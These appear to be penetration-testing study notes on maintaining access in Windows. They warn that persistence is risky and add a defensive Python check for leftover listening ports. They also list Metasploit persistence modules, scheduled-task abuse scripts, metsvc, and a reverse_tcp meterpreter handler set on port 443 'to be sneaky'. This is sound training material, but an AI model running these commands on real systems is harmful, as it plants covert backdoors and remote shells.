Maintaining Access
Persistence is dangerous and usually unnecessary for junior-to-mid-level pentesting (time-limited engagements, not red teaming). It opens a port on a machine with no credentials, which leaves it wide open to a future attack. You'll have to go back in afterwards, delete the service, and remove it from the registry. The script will give you an RC file that goes in and deletes the files for you, but it's still generally dangerous and unnecessary.
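Added example (not part of the original notes): one way to confirm that cleanup left no open port behind is to diff `netstat -ano` output captured before the engagement against output captured after removal. The netstat captures, addresses, port and PIDs below are constructed sample values, and the function names are hypothetical.

```python
# Added example: flag TCP listeners that were not present in the baseline.
# Both netstat captures below are constructed sample data.

BASELINE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    [::]:445               [::]:0                 LISTENING       4
  UDP    0.0.0.0:500            *:*                                    1020
"""

AFTER_CLEANUP = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING       2976
  TCP    10.0.0.5:49712         10.0.0.9:443           ESTABLISHED     3120
  TCP    [::]:445               [::]:0                 LISTENING       4
  UDP    0.0.0.0:500            *:*                                    1020
"""


def parse_listeners(netstat_text):
    """Return {(address, port): pid} for LISTENING TCP rows of `netstat -ano`."""
    listeners = {}
    for line in netstat_text.splitlines():
        fields = line.split()
        # TCP rows have 5 columns: Proto, Local, Foreign, State, PID.
        # The header and UDP rows have a different column count and are skipped.
        if len(fields) != 5 or fields[0] != "TCP" or fields[3] != "LISTENING":
            continue
        address, _, port = fields[1].rpartition(":")  # keeps "[::]" intact
        listeners[(address, int(port))] = int(fields[4])
    return listeners


def leftover_listeners(baseline_text, current_text):
    """Return sorted (address, port, pid) listeners absent from the baseline."""
    baseline = parse_listeners(baseline_text)
    current = parse_listeners(current_text)
    return sorted(
        (addr, port, pid)
        for (addr, port), pid in current.items()
        if (addr, port) not in baseline
    )


if __name__ == "__main__":
    for addr, port, pid in leftover_listeners(BASELINE, AFTER_CLEANUP):
        print(f"listener not in baseline: {addr}:{port} (PID {pid})")
```

Any listener reported here should be traced to its owning process by PID and removed before the engagement is closed out.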
Persistence Scripts
meterpreter > run persistence -h
exploit/windows/local/persistence
exploit/windows/local/registry_persistence
If you want to get a meterpreter shell back:
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
# might set lport to be a known port to be sneaky
msf5 exploit(multi/handler) > set lport 443
msf5 exploit(multi/handler) > set lhost 192.168.202.128
Scheduled Tasks
run scheduleme
run schtaskabuse
Metsvc
run metsvc -A